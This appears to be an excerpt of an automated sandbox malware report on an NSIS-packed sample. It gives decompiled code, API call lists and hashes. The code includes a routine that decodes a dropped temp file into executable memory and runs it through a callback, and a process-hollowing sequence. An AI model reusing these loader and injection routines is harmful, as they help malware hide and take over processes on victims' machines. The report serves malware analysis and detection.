                  						_t106 = _t109;
                  						asm("sbb eax, eax");
                  						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                  						__eflags = _t109 - _t82;
                  						if(_t109 >= _t82) {
                  							_t106 = _t82;
                  						}
                  						_t83 = E004031A8(0x417048, _t106); // executed
                  						__eflags = _t83;
                  						if(_t83 == 0) {
                  							E00402BC5(1);
                  							L30:
                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                  						}
                  						__eflags =  *0x423eb4;
                  						if( *0x423eb4 != 0) {
                  							__eflags = _a4 & 0x00000002;
                  							if((_a4 & 0x00000002) == 0) {
                  								E00402BC5(0);
                  							}
                  							goto L19;
                  						}
                  						E0040571D( &_v40, 0x417048, 0x1c);
                  						_t89 = _v40;
                  						__eflags = _t89 & 0xfffffff0;
                  						if((_t89 & 0xfffffff0) != 0) {
                  							goto L19;
                  						}
                  						__eflags = _v36 - 0xdeadbeef;
                  						if(_v36 != 0xdeadbeef) {
                  							goto L19;
                  						}
                  						__eflags = _v24 - 0x74736e49;
                  						if(_v24 != 0x74736e49) {
                  							goto L19;
                  						}
                  						__eflags = _v28 - 0x74666f73;
                  						if(_v28 != 0x74666f73) {
                  							goto L19;
                  						}
                  						__eflags = _v32 - 0x6c6c754e;
                  						if(_v32 != 0x6c6c754e) {
                  							goto L19;
                  						}
                  						_a4 = _a4 | _t89;
                  						_t103 =  *0x417038; // 0x0
                  						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                  						_t92 = _v16;
                  						__eflags = _t92 - _t109;
                  						 *0x423eb4 = _t103;
                  						if(_t92 > _t109) {
                  							goto L30;
                  						}
                  						__eflags = _a4 & 0x00000008;
                  						if((_a4 & 0x00000008) != 0) {
                  							L15:
                  							_v12 = _v12 + 1;
                  							_t109 = _t92 - 4;
                  							__eflags = _t106 - _t109;
                  							if(_t106 > _t109) {
                  								_t106 = _t109;
                  							}
                  							goto L19;
                  						}
                  						__eflags = _a4 & 0x00000004;
                  						if((_a4 & 0x00000004) != 0) {
                  							goto L22;
                  						}
                  						goto L15;
                  						L19:
                  						__eflags = _t109 -  *0x41f048; // 0x1531
                  						if(__eflags < 0) {
                  							_v8 = E00405E0F(_v8, 0x417048, _t106);
                  						}
                  						 *0x417038 =  *0x417038 + _t106;
                  						_t109 = _t109 - _t106;
                  						__eflags = _t109;
                  					} while (_t109 > 0);
                  					goto L22;
                  				}
                  			}

                  APIs
                  • GetTickCount.KERNEL32 ref: 00402C6F
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kVijllv0Yl.exe,00000400), ref: 00402C8B
                    • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00405760
                    • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00402CD4
                  • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                  Strings
                  • "C:\Users\user\Desktop\kVijllv0Yl.exe" , xrefs: 00402C68
                  • soft, xrefs: 00402D4B
                  • Null, xrefs: 00402D54
                  • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                  • Inst, xrefs: 00402D42
                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                  • C:\Users\user\Desktop\kVijllv0Yl.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                  • Error launching installer, xrefs: 00402CAB
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\kVijllv0Yl.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                  • API String ID: 2803837635-1694646312
                  • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                  • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (function 00401734; legend: Executed / Not Executed)
                  C-Code - Quality: 75%
                  			E00401734(FILETIME* __ebx, void* __eflags) {
                  				void* _t33;
                  				void* _t41;
                  				void* _t43;
                  				FILETIME* _t49;
                  				FILETIME* _t62;
                  				void* _t64;
                  				signed int _t70;
                  				FILETIME* _t71;
                  				FILETIME* _t75;
                  				signed int _t77;
                  				void* _t80;
                  				CHAR* _t82;
                  				void* _t85;
                  
                  				_t75 = __ebx;
                  				_t82 = E004029E8(0x31);
                  				 *(_t85 - 8) = _t82;
                  				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                  				_t33 = E004055E5(_t82);
                  				_push(_t82);
                  				if(_t33 == 0) {
                  					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                  				} else {
                  					_push(0x409b68);
                  					E00405A85();
                  				}
                  				E00405CE3(0x409b68);
                  				while(1) {
                  					__eflags =  *(_t85 + 8) - 3;
                  					if( *(_t85 + 8) >= 3) {
                  						_t64 = E00405D7C(0x409b68);
                  						_t77 = 0;
                  						__eflags = _t64 - _t75;
                  						if(_t64 != _t75) {
                  							_t71 = _t64 + 0x14;
                  							__eflags = _t71;
                  							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                  						}
                  						asm("sbb eax, eax");
                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                  						__eflags = _t70;
                  						 *(_t85 + 8) = _t70;
                  					}
                  					__eflags =  *(_t85 + 8) - _t75;
                  					if( *(_t85 + 8) == _t75) {
                  						E0040573D(0x409b68);
                  					}
                  					__eflags =  *(_t85 + 8) - 1;
                  					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                  					__eflags = _t41 - 0xffffffff;
                  					 *(_t85 - 0x34) = _t41;
                  					if(_t41 != 0xffffffff) {
                  						break;
                  					}
                  					__eflags =  *(_t85 + 8) - _t75;
                  					if( *(_t85 + 8) != _t75) {
                  						E00404E23(0xffffffe2,  *(_t85 - 8));
                  						__eflags =  *(_t85 + 8) - 2;
                  						if(__eflags == 0) {
                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                  						}
                  						L31:
                  						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                  						__eflags =  *0x423f28;
                  						goto L32;
                  					} else {
                  						E00405A85(0x40a368, 0x424000);
                  						E00405A85(0x424000, 0x409b68);
                  						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp\\nsg69F4.tmp\\xfmkprutvpn.dll",  *((intOrPtr*)(_t85 - 0x10)));
                  						E00405A85(0x424000, 0x40a368);
                  						_t62 = E00405346("C:\\Users\\engineer\\AppData\\Local\\Temp\\nsg69F4.tmp\\xfmkprutvpn.dll",  *(_t85 - 0x24) >> 3) - 4;
                  						__eflags = _t62;
                  						if(_t62 == 0) {
                  							continue;
                  						} else {
                  							__eflags = _t62 == 1;
                  							if(_t62 == 1) {
                  								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                  								L32:
                  								_t49 = 0;
                  								__eflags = 0;
                  							} else {
                  								_push(0x409b68);
                  								_push(0xfffffffa);
                  								E00404E23();
                  								L29:
                  								_t49 = 0x7fffffff;
                  							}
                  						}
                  					}
                  					L33:
                  					return _t49;
                  				}
                  				E00404E23(0xffffffea,  *(_t85 - 8));
                  				 *0x423f54 =  *0x423f54 + 1;
                  				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                  				 *0x423f54 =  *0x423f54 - 1;
                  				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                  				_t80 = _t43;
                  				if( *(_t85 - 0x18) != 0xffffffff) {
                  					L22:
                  					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                  				} else {
                  					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                  					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                  						goto L22;
                  					}
                  				}
                  				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                  				__eflags = _t80 - _t75;
                  				if(_t80 >= _t75) {
                  					goto L31;
                  				} else {
                  					__eflags = _t80 - 0xfffffffe;
                  					if(_t80 != 0xfffffffe) {
                  						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                  					} else {
                  						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                  						lstrcatA(0x409b68,  *(_t85 - 8));
                  					}
                  					_push(0x200010);
                  					_push(0x409b68);
                  					E00405346();
                  					goto L29;
                  				}
                  				goto L33;
                  			}

                  APIs
                  • lstrcatA.KERNEL32(00000000,00000000,mcchdhqnu,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                  • CompareFileTime.KERNEL32(-00000014,?,mcchdhqnu,mcchdhqnu,00000000,00000000,mcchdhqnu,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsg69F4.tmp$C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll$mcchdhqnu
                  • API String ID: 1941528284-4160001213
                  • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                  • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 385 21b109c-21b114a call 21b06c7 call 21b0776 * 7 402 21b114d-21b1151 385->402 403 21b1169-21b1176 402->403 404 21b1153-21b1167 402->404 405 21b1179-21b117d 403->405 404->402 406 21b117f-21b1193 405->406 407 21b1195-21b11b1 405->407 406->405 409 21b11bb-21b11e5 CreateProcessW 407->409 410 21b11b3-21b11b6 407->410 413 21b11ef-21b1208 GetThreadContext 409->413 414 21b11e7-21b11ea 409->414 411 21b135e-21b1361 410->411 415 21b120a-21b120d 413->415 416 21b1212-21b122c ReadProcessMemory 413->416 414->411 415->411 417 21b122e-21b1231 416->417 418 21b1236-21b123f 416->418 417->411 419 21b1269-21b1289 VirtualAllocEx 418->419 420 21b1241-21b1250 418->420 422 21b128b-21b128e 419->422 423 21b1293-21b12ab call 21b0267 419->423 420->419 421 21b1252-21b1258 call 21b0368 420->421 426 21b125d-21b125f 421->426 422->411 429 21b12ad-21b12b0 423->429 430 21b12b5-21b12b9 423->430 426->419 428 21b1261-21b1264 426->428 428->411 429->411 431 21b12c2-21b12cc 430->431 432 21b12ce-21b12fc call 21b0267 431->432 433 21b1303-21b131f call 21b0267 431->433 436 21b1301 432->436 439 21b1321-21b1324 433->439 440 21b1326-21b1344 SetThreadContext 433->440 436->431 439->411 441 21b134b-21b134e call 21b01b6 440->441 442 21b1346-21b1349 440->442 444 21b1353-21b1355 441->444 442->411 445 21b135c 444->445 446 21b1357-21b135a 444->446 445->411 446->411
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 021B11E0
                  • GetThreadContext.KERNELBASE(?,00010007), ref: 021B1203
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ContextCreateProcessThread
                  • String ID: D
                  • API String ID: 2843130473-2746444292
                  • Opcode ID: af8e008d8f2d723ba368ec0f7b572a00a24864ff06e9a32261ca2f6c9622e257
                  • Instruction ID: b0913f69d2fab415386f3ece4fa3439b7a4b2d7ec15afbfffe6cb95552aed6e5
                  • Opcode Fuzzy Hash: af8e008d8f2d723ba368ec0f7b572a00a24864ff06e9a32261ca2f6c9622e257
                  • Instruction Fuzzy Hash: 28A1D171E80209EFDB55DFA4C990BEEBBB9BF08344F1144A5E519EB260E731AA41CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E735E1000(void* __edx) {
                  				short _v8;
                  				short _v10;
                  				short _v12;
                  				short _v14;
                  				short _v16;
                  				short _v18;
                  				short _v20;
                  				short _v22;
                  				short _v24;
                  				short _v26;
                  				char _v28;
                  				long _v32;
                  				short _v1072;
                  				short _t19;
                  				short _t20;
                  				short _t21;
                  				short _t22;
                  				short _t23;
                  				short _t24;
                  				short _t25;
                  				short _t26;
                  				void* _t28;
                  				void* _t36;
                  				_Unknown_base(*)()* _t38;
                  				int _t41;
                  				long _t53;
                  				short _t54;
                  				void* _t57;
                  				_Unknown_base(*)()* _t63;
                  				long _t65;
                  				void* _t67;
                  
                  				_t54 = 0x75;
                  				_t19 = 0x79;
                  				_v26 = _t19;
                  				_t65 = 0x17d78400;
                  				_t20 = 0x61;
                  				_v24 = _t20;
                  				_t21 = 0x73;
                  				_v20 = _t21;
                  				_t22 = 0x63;
                  				_v18 = _t22;
                  				_t23 = 0x72;
                  				_v16 = _t23;
                  				_t24 = 0x6f;
                  				_v14 = _t24;
                  				_t25 = 0x70;
                  				_v12 = _t25;
                  				_t26 = 0x71;
                  				_v10 = _t26;
                  				_v28 = _t54;
                  				_v22 = _t54;
                  				_v8 = 0;
                  				_t28 = VirtualAlloc(0, 0x17d78400, 0x3000, 4); // executed
                  				if(_t28 == 0) {
                  					return 0;
                  				} else {
                  					do {
                  						 *_t28 = 0;
                  						_t28 = _t28 + 1;
                  						_t65 = _t65 - 1;
                  					} while (_t65 != 0);
                  					GetTempPathW(0x103,  &_v1072);
                  					E735E4C95( &_v1072,  &_v28);
                  					_t36 = CreateFileW( &_v1072, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                  					_t67 = _t36;
                  					_t53 = GetFileSize(_t67, 0);
                  					_t38 = VirtualAlloc(0, _t53, 0x3000, 0x40); // executed
                  					_t63 = _t38;
                  					ReadFile(_t67, _t63, _t53,  &_v32, 0); // executed
                  					_t57 = 0;
                  					if(_t53 != 0) {
                  						do {
                  							 *((char*)(_t57 + _t63)) = ((( *((intOrPtr*)(_t57 + _t63)) + 0x00000001 ^ 0x0000009b) - 0x0000003b ^ 0x00000085) - 0x00000056 ^ 0x00000006) - 0x53;
                  							_t57 = _t57 + 1;
                  						} while (_t57 < _t53);
                  					}
                  					_t41 = EnumResourceTypesA(0, _t63, 0); // executed
                  					return _t41;
                  				}
                  			}

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 735E106B
                  • GetTempPathW.KERNEL32(00000103,?), ref: 735E1089
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 735E10B8
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 735E10C2
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 735E10D4
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 735E10E1
                  • EnumResourceTypesA.KERNEL32 ref: 735E110B
                  Memory Dump Source
                  • Source File: 00000000.00000002.361811622.00000000735E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 735E0000, based on PE: true
                  • Associated: 00000000.00000002.361802453.00000000735E0000.00000002.00000001.01000000.00000004.sdmp
                  • Associated: 00000000.00000002.361822810.00000000735E5000.00000002.00000001.01000000.00000004.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_735e0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$AllocVirtual$CreateEnumPathReadResourceSizeTempTypes
                  • String ID:
                  • API String ID: 2006121276-0
                  • Opcode ID: 0ee06f84e94349a929d64fc308d8c730fddf2d600c3a157b9be70473c733fb8d
                  • Instruction ID: 8499286cbe66cc6ed5bebb856729d8f4c19082b06fd9043a378719e76afb281c
                  • Opcode Fuzzy Hash: 0ee06f84e94349a929d64fc308d8c730fddf2d600c3a157b9be70473c733fb8d
                  • Instruction Fuzzy Hash: 8931C162A883497AFB109AF1AC56FBF673CEF44B11F104456F708EF1C0D1A15A4683A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 505 402f01-402f10 506 402f12-402f28 SetFilePointer 505->506 507 402f2e-402f39 call 40302c 505->507 506->507 510 403025-403029 507->510 511 402f3f-402f59 ReadFile 507->511 512 403022 511->512 513 402f5f-402f62 511->513 514 403024 512->514 513->512 515 402f68-402f7b call 40302c 513->515 514->510 515->510 518 402f81-402f84 515->518 519 402ff1-402ff7 518->519 520 402f86-402f89 518->520 523 402ff9 519->523 524 402ffc-40300f ReadFile 519->524 521 40301d-403020 520->521 522 402f8f 520->522 521->510 526 402f94-402f9c 522->526 523->524 524->512 525 403011-40301a 524->525 525->521 527 402fa1-402fb3 ReadFile 526->527 528 402f9e 526->528 527->512 529 402fb5-402fb8 527->529 528->527 529->512 530 402fba-402fcf WriteFile 529->530 531 402fd1-402fd4 530->531 532 402fed-402fef 530->532 531->532 533 402fd6-402fe9 531->533 532->514 533->526 534 402feb 533->534 534->521
                  C-Code - Quality: 93%
                  			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                  				long _v8;
                  				intOrPtr _v12;
                  				void _t31;
                  				intOrPtr _t32;
                  				int _t35;
                  				long _t36;
                  				int _t37;
                  				long _t38;
                  				int _t40;
                  				int _t42;
                  				long _t43;
                  				long _t44;
                  				long _t55;
                  				long _t57;
                  
                  				_t31 = _a4;
                  				if(_t31 >= 0) {
                  					_t44 = _t31 +  *0x423ef8;
                  					 *0x41703c = _t44;
                  					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                  				}
                  				_t57 = 4;
                  				_t32 = E0040302C(_t57);
                  				if(_t32 >= 0) {
                  					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                  					if(_t35 == 0 || _v8 != _t57) {
                  						L23:
                  						_push(0xfffffffd);
                  						goto L24;
                  					} else {
                  						 *0x41703c =  *0x41703c + _t57;
                  						_t32 = E0040302C(_a4);
                  						_v12 = _t32;
                  						if(_t32 >= 0) {
                  							if(_a12 != 0) {
                  								_t36 = _a4;
                  								if(_t36 >= _a16) {
                  									_t36 = _a16;
                  								}
                  								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                  								if(_t37 == 0) {
                  									goto L23;
                  								} else {
                  									_t38 = _v8;
                  									 *0x41703c =  *0x41703c + _t38;
                  									_v12 = _t38;
                  									goto L22;
                  								}
                  							} else {
                  								if(_a4 <= 0) {
                  									L22:
                  									_t32 = _v12;
                  								} else {
                  									while(1) {
                  										_t55 = 0x4000;
                  										if(_a4 < 0x4000) {
                  											_t55 = _a4;
                  										}
                  										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                  										if(_t40 == 0 || _t55 != _v8) {
                  											goto L23;
                  										}
                  										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                  										if(_t42 == 0 || _a16 != _t55) {
                  											_push(0xfffffffe);
                  											L24:
                  											_pop(_t32);
                  										} else {
                  											_t43 = _v8;
                  											_v12 = _v12 + _t43;
                  											_a4 = _a4 - _t43;
                  											 *0x41703c =  *0x41703c + _t43;
                  											if(_a4 > 0) {
                  												continue;
                  											} else {
                  												goto L22;
                  											}
                  										}
                  										goto L25;
                  									}
                  									goto L23;
                  								}
                  							}
                  						}
                  					}
                  				}
                  				L25:
                  				return _t32;
                  			}

                  APIs
                  • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                  • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                  • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                  • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Read$PointerWrite
                  • String ID: 80A
                  • API String ID: 2113905535-195308239
                  • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                  • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 535 40302c-403055 GetTickCount 536 403196-40319e call 402bc5 535->536 537 40305b-403086 call 4031da SetFilePointer 535->537 542 4031a0-4031a5 536->542 543 40308b-40309d 537->543 544 4030a1-4030af call 4031a8 543->544 545 40309f 543->545 548 4030b5-4030c1 544->548 549 403188-40318b 544->549 545->544 550 4030c7-4030cd 548->550 549->542 551 4030f8-403114 call 405e9d 550->551 552 4030cf-4030d5 550->552 558 403191 551->558 559 403116-40311e 551->559 552->551 553 4030d7-4030f7 call 402bc5 552->553 553->551 560 403193-403194 558->560 561 403120-403136 WriteFile 559->561 562 403152-403158 559->562 560->542 563 403138-40313c 561->563 564 40318d-40318f 561->564 562->558 565 40315a-40315c 562->565 563->564 566 40313e-40314a 563->566 564->560 565->558 567 40315e-403171 565->567 566->550 568 403150 566->568 567->543 569 403177-403186 SetFilePointer 567->569 568->567 569->536
                  C-Code - Quality: 94%
                  			E0040302C(intOrPtr _a4) {
                  				long _v4;
                  				void* __ecx;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				signed int _t14;
                  				void* _t16;
                  				void* _t17;
                  				long _t18;
                  				int _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t34;
                  				long _t35;
                  				intOrPtr _t37;
                  				void* _t39;
                  				long _t40;
                  				intOrPtr _t53;
                  
                  				_t35 =  *0x41703c; // 0x41e52
                  				_t37 = _t35 -  *0x40afa8 + _a4;
                  				 *0x423eac = GetTickCount() + 0x1f4;
                  				if(_t37 <= 0) {
                  					L23:
                  					E00402BC5(1);
                  					return 0;
                  				}
                  				E004031DA( *0x41f04c);
                  				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                  				 *0x41f048 = _t37;
                  				 *0x417038 = 0;
                  				while(1) {
                  					_t12 =  *0x417040; // 0x3c635
                  					_t34 = 0x4000;
                  					_t13 = _t12 -  *0x41f04c;
                  					if(_t13 <= 0x4000) {
                  						_t34 = _t13;
                  					}
                  					_t14 = E004031A8(0x413038, _t34); // executed
                  					if(_t14 == 0) {
                  						break;
                  					}
                  					 *0x41f04c =  *0x41f04c + _t34;
                  					 *0x40afc8 = 0x413038;
                  					 *0x40afcc = _t34;
                  					L6:
                  					L6:
                  					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                  						_t22 =  *0x41f048; // 0x1531
                  						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                  						E00402BC5(0);
                  					}
                  					 *0x40afd0 = 0x40b038;
                  					 *0x40afd4 = 0x8000; // executed
                  					_t16 = E00405E9D(0x40afb0); // executed
                  					if(_t16 < 0) {
                  						goto L21;
                  					}
                  					_t39 =  *0x40afd0; // 0x40c569
                  					_t40 = _t39 - 0x40b038;
                  					if(_t40 == 0) {
                  						__eflags =  *0x40afcc; // 0x0
                  						if(__eflags != 0) {
                  							goto L21;
                  						}
                  						__eflags = _t34;
                  						if(_t34 == 0) {
                  							goto L21;
                  						}
                  						L17:
                  						_t18 =  *0x41703c; // 0x41e52
                  						if(_t18 -  *0x40afa8 + _a4 > 0) {
                  							continue;
                  						}
                  						SetFilePointer( *0x409014, _t18, 0, 0); // executed
                  						goto L23;
                  					}
                  					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                  					if(_t21 == 0 || _t40 != _v4) {
                  						_push(0xfffffffe);
                  						L22:
                  						_pop(_t17);
                  						return _t17;
                  					} else {
                  						 *0x40afa8 =  *0x40afa8 + _t40;
                  						_t53 =  *0x40afcc; // 0x0
                  						if(_t53 != 0) {
                  							goto L6;
                  						}
                  						goto L17;
                  					}
                  					L21:
                  					_push(0xfffffffd);
                  					goto L22;
                  				}
